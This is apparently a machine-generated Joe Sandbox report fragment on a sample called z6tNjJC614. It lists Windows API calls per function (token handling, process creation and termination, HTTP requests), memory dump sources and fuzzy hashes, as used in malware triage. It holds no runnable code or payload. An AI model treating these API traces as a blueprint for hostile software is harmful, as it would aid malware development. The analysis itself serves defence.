  • Part of subcall function 005680A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005680F6
• GetLengthSid.ADVAPI32(?,00000000,0056842F), ref: 005688CA
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 005688D6
• HeapAlloc.KERNEL32(00000000), ref: 005688DD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 005688F6
• GetProcessHeap.KERNEL32(00000000,00000000,0056842F), ref: 0056890A
• HeapFree.KERNEL32(00000000), ref: 00568911
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
• Opcode ID: a1faeb42c31bf46a5376270de8af9a3ea75625e50d1b5dacd7830e0c9497519a
• Instruction ID: 15fcdaa4c5ef3e4541caec73b4041da45571835bce0f43893b7757033c8cab56
• Opcode Fuzzy Hash: a1faeb42c31bf46a5376270de8af9a3ea75625e50d1b5dacd7830e0c9497519a
• Instruction Fuzzy Hash: 1211AF31501209FFDB109FA4DC09BBE7B68FB45311F14462DF885D7110CB329914EB60
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005685E2
• OpenProcessToken.ADVAPI32(00000000), ref: 005685E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 005685F8
• CloseHandle.KERNEL32(00000004), ref: 00568603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00568632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00568646
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: c04cc0119a516bca4948e62bdc12f16561c9e9e0acf089b56666a0c04618ecbf
• Instruction ID: dc88b4a257a3587ca67f8eff9d1685082aa8874b6896e353e7652fab311a17e6
• Opcode Fuzzy Hash: c04cc0119a516bca4948e62bdc12f16561c9e9e0acf089b56666a0c04618ecbf
• Instruction Fuzzy Hash: 17115972501209ABDF018FA4DD49BEE7BA9FF18344F054165FE05E2160C7729D64EB60
APIs
• GetDC.USER32(00000000), ref: 0056B7B5
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0056B7C6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0056B7CD
• ReleaseDC.USER32(00000000,00000000), ref: 0056B7D5
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 0056B7EC
• MulDiv.KERNEL32(000009EC,?,?), ref: 0056B7FE
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: 081d0cf32114a645f75aa9d2a25c23df7946d3f3dfaa2c479a93f591630085f5
• Instruction ID: 3bf1b62feb0377d3d478271eab827b294b68d789f6a277a89301838ce8dffa26
• Opcode Fuzzy Hash: 081d0cf32114a645f75aa9d2a25c23df7946d3f3dfaa2c479a93f591630085f5
• Instruction Fuzzy Hash: 680184B5E00309BBEB109BA6DC49A5EBFB8EB58321F004076FA04E7291D6309C10DFA0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00530193
• MapVirtualKeyW.USER32(00000010,00000000), ref: 0053019B
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 005301A6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 005301B1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 005301B9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 005301C1
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: fe13c7fdb030b11cbecc33ec4bb0c95fb718992bd8c812f27547834975d9ff95
• Instruction ID: 74c1caa43d6ec82cb53950815f4fb3b18793e132bb4c78f3b48674360b474293
• Opcode Fuzzy Hash: fe13c7fdb030b11cbecc33ec4bb0c95fb718992bd8c812f27547834975d9ff95
• Instruction Fuzzy Hash: 4F016CB09017597DE3008F5A8C85B52FFB8FF19354F00411BA15C87941C7F5A868CBE5
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005753F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0057540F
• GetWindowThreadProcessId.USER32(?,?), ref: 0057541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057542D
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00575437
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057543E
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: 6281fbad62e0f10fdfd82307ce12c1337a156cee5a732e16471e7ae98f6cb832
• Instruction ID: 1885bfd1db6d6878577002ba1ec758896623a6c61082efc45afeda7e7e791e75
• Opcode Fuzzy Hash: 6281fbad62e0f10fdfd82307ce12c1337a156cee5a732e16471e7ae98f6cb832
• Instruction Fuzzy Hash: DCF06D32240258BBE7215BA2DC0DEAF7A7CEBD6B11F01016AFA04D1050A7A01A05E7B5
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00577243
• EnterCriticalSection.KERNEL32(?,?,00520EE4,?,?), ref: 00577254
• TerminateThread.KERNEL32(00000000,000001F6,?,00520EE4,?,?), ref: 00577261
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,00520EE4,?,?), ref: 0057726E
  • Part of subcall function 00576C35: CloseHandle.KERNEL32(00000000,?,0057727B,?,00520EE4,?,?), ref: 00576C3F
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00577281
• LeaveCriticalSection.KERNEL32(?,?,00520EE4,?,?), ref: 00577288
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 198a95c81118d7e075b4845ffa5fb51083fce98f7dc9ae37303dde53080f072b
• Instruction ID: 55b5896af550b98af60957d143b896e15ecd8a133febad600a4ae3c30a1c50b2
• Opcode Fuzzy Hash: 198a95c81118d7e075b4845ffa5fb51083fce98f7dc9ae37303dde53080f072b
• Instruction Fuzzy Hash: B5F05E3E540612EBDB121B64FD4CADA7B29FF69702B160533F603D10A1CB766815EB50
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0056899D
• UnloadUserProfile.USERENV(?,?), ref: 005689A9
• CloseHandle.KERNEL32(?), ref: 005689B2
• CloseHandle.KERNEL32(?), ref: 005689BA
• GetProcessHeap.KERNEL32(00000000,?), ref: 005689C3
• HeapFree.KERNEL32(00000000), ref: 005689CA
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: 1a11d1543d93b920a3228804556aa6cf2080c50ac0a9b4e0e8b8d43f37b9ff54
• Instruction ID: 8d464f50f37256ec463c1addae435fd1a25e677c84dfe6b02728a165975821f9
• Opcode Fuzzy Hash: 1a11d1543d93b920a3228804556aa6cf2080c50ac0a9b4e0e8b8d43f37b9ff54
• Instruction Fuzzy Hash: A5E0C236004001FBDA011FF1EC0C90ABB69FBA9322B268632F219C1070CB329428FB90
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,005A2C7C,?), ref: 005676EA
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,005A2C7C,?), ref: 00567702
• CLSIDFromProgID.OLE32(?,?,00000000,0059FB80,000000FF,?,00000000,00000800,00000000,?,005A2C7C,?), ref: 00567727
• _memcmp.LIBCMT ref: 00567748
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID: ,,Z
• API String ID: 314563124-2090448338
• Opcode ID: 0b5cec85e9395f737d4c5e2db29697fee67be5bf8556299cc99cdd4eb843a31c
• Instruction ID: 1d877ee21767c31190f4f8c8e0a820e7526b31ab6492a8caf794907fcd34c418
• Opcode Fuzzy Hash: 0b5cec85e9395f737d4c5e2db29697fee67be5bf8556299cc99cdd4eb843a31c
• Instruction Fuzzy Hash: 9A81DD75A0010DEFCB04DFA4C984DEEBBB9FF89315F204599E506AB250DB71AE46CB60
APIs
• VariantInit.OLEAUT32(?), ref: 00588613
• CharUpperBuffW.USER32(?,?), ref: 00588722
• VariantClear.OLEAUT32(?), ref: 0058889A
  • Part of subcall function 00577562: VariantInit.OLEAUT32(00000000), ref: 005775A2
  • Part of subcall function 00577562: VariantCopy.OLEAUT32(00000000,?), ref: 005775AB
  • Part of subcall function 00577562: VariantClear.OLEAUT32(00000000), ref: 005775B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
• Opcode ID: 67c6b7de4f34c0f259e392f598cf7b164796ea3578c8dcc9347d03f7a047fc08
• Instruction ID: a17dbf625ffc1058eaa3a2d0de1fe0723f469ab2fb1b56b531409f19cf179be0
• Opcode Fuzzy Hash: 67c6b7de4f34c0f259e392f598cf7b164796ea3578c8dcc9347d03f7a047fc08
• Instruction Fuzzy Hash: 17916A706043029FCB10EF24C48496ABBE4FFC9714F54892EF89A9B361DB31E945CB92
                                                                      APIs
                                                                        • Part of subcall function 0052FC86: _wcscpy.LIBCMT ref: 0052FCA9
                                                                      • _memset.LIBCMT ref: 00572B87
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00572BB6
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00572C69
                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00572C97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                      • String ID: 0
                                                                      • API String ID: 4152858687-4108050209
                                                                      • Opcode ID: 3667c1342e71a7e8f446afad0a0d0f98d2af21d64788c976fe9b4667ef6e7398
                                                                      • Instruction ID: 4df505a26ea3d86177d48789126437fc547fc3e648d18375f331a2f160e8ef0e
                                                                      • Opcode Fuzzy Hash: 3667c1342e71a7e8f446afad0a0d0f98d2af21d64788c976fe9b4667ef6e7398
                                                                      • Instruction Fuzzy Hash: 9151B171608301ABD7269E28E845A6F7FE8FFA5310F14892EF899D3191DB70CD44A752
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$_free
                                                                      • String ID: 3cR$_R
                                                                      • API String ID: 2620147621-502522525
                                                                      • Opcode ID: e4e9e555283512df2106cd34043da1d830821297a822326bd78398df52614bc8
                                                                      • Instruction ID: c202dfff10e545c532d494465a69e4d92eb79007242d46c9bf58aab735ba3c76
                                                                      • Opcode Fuzzy Hash: e4e9e555283512df2106cd34043da1d830821297a822326bd78398df52614bc8
                                                                      • Instruction Fuzzy Hash: A1519A71A043518FDB24DF28D495B6BBBE5BFC6300F44486DE98987391EB35E905CB82
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$_memmove
                                                                      • String ID: 3cR$ERCP
                                                                      • API String ID: 2532777613-3539264084
                                                                      • Opcode ID: d0c542378bc4de15961fa2f3ca53218224aace70a59fb901cc81af73e6cc8222
                                                                      • Instruction ID: 749c87730d9049c84d5910c3eed7f95995be73ad2b624ae20b3fe55f1a21b44e
                                                                      • Opcode Fuzzy Hash: d0c542378bc4de15961fa2f3ca53218224aace70a59fb901cc81af73e6cc8222
                                                                      • Instruction Fuzzy Hash: 6C518D71900716DBDB24CFA5D845BAABBF4FF45314F20496EE44AD7291E770AA44CB80
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 005727C0
                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 005727DC
                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00572822
                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005D5890,00000000), ref: 0057286B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                      • String ID: 0
                                                                      • API String ID: 1173514356-4108050209
                                                                      • Opcode ID: ea78cd05971071fd6fb855ab40bdaba416bc2332e108fb6ee99a036d046d06fa
                                                                      • Instruction ID: c9c1c99f5987b680ea0a25eae40c4382ba09fdac8037a44c241ff81d181ae95c
                                                                      • Opcode Fuzzy Hash: ea78cd05971071fd6fb855ab40bdaba416bc2332e108fb6ee99a036d046d06fa
                                                                      • Instruction Fuzzy Hash: 4D418C702043429FD720DF25E848B5ABFE8FF85314F14892EF9A997292D731A905DB52
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0058D7C5
                                                                        • Part of subcall function 0051784B: _memmove.LIBCMT ref: 00517899
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharLower_memmove
                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                      • API String ID: 3425801089-567219261
                                                                      • Opcode ID: a8cfa4a8f10cf6360725c03a4fe02858e7cc0f7e0008fefb05cb796aa40d6967
                                                                      • Instruction ID: dc42dc4d6e13426c7a973dc59aaf0e00f6c91de3ff1f1dd3d1c881c16278d29f
                                                                      • Opcode Fuzzy Hash: a8cfa4a8f10cf6360725c03a4fe02858e7cc0f7e0008fefb05cb796aa40d6967
                                                                      • Instruction Fuzzy Hash: 6A31927190461AAFDF00EF58C8599EEBBF4FF44320B108A29E825A76D1DB31A905CB90
                                                                      APIs
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                        • Part of subcall function 0056AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0056AABC
                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00568F14
                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00568F27
                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00568F57
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_memmove$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 365058703-1403004172
                                                                      • Opcode ID: 9277f993cc8b21983c3655b2c57e74ca0a2b790aafd9374c638fd27944458e48
                                                                      • Instruction ID: 2b46f7711e5481795f69c0a43129b51848bb8d6e0b91ba6e99a9e0821e4d1faa
                                                                      • Opcode Fuzzy Hash: 9277f993cc8b21983c3655b2c57e74ca0a2b790aafd9374c638fd27944458e48
                                                                      • Instruction Fuzzy Hash: 6821D271A04109BEEB14ABB4DC49DFEBF79FF95320B14461AF421A71E1DF394889DA10
                                                                      APIs
                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0058184C
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00581872
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 005818A2
                                                                      • InternetCloseHandle.WININET(00000000), ref: 005818E9
                                                                        • Part of subcall function 00582483: GetLastError.KERNEL32(?,?,00581817,00000000,00000000,00000001), ref: 00582498
                                                                        • Part of subcall function 00582483: SetEvent.KERNEL32(?,?,00581817,00000000,00000000,00000001), ref: 005824AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      • Opcode ID: 4477b5572c11a8fdede1735befa61eac487e3422f1a9580ff8ab28567b8fa504
                                                                      • Instruction ID: 30b989b8f72432e35e0f1b5be2720e2807841fedd924fb55461e5306f642f11f
                                                                      • Opcode Fuzzy Hash: 4477b5572c11a8fdede1735befa61eac487e3422f1a9580ff8ab28567b8fa504
                                                                      • Instruction Fuzzy Hash: 4C2183715006087FEB11AB64DC86EBB7BEDFB88744F10412AF805E7140DB649D055BB5
                                                                      APIs
                                                                        • Part of subcall function 00511D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00511D73
                                                                        • Part of subcall function 00511D35: GetStockObject.GDI32(00000011), ref: 00511D87
                                                                        • Part of subcall function 00511D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00511D91
                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00596461
                                                                      • LoadLibraryW.KERNEL32(?), ref: 00596468
                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0059647D
                                                                      • DestroyWindow.USER32(?), ref: 00596485
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 4146253029-1011021900
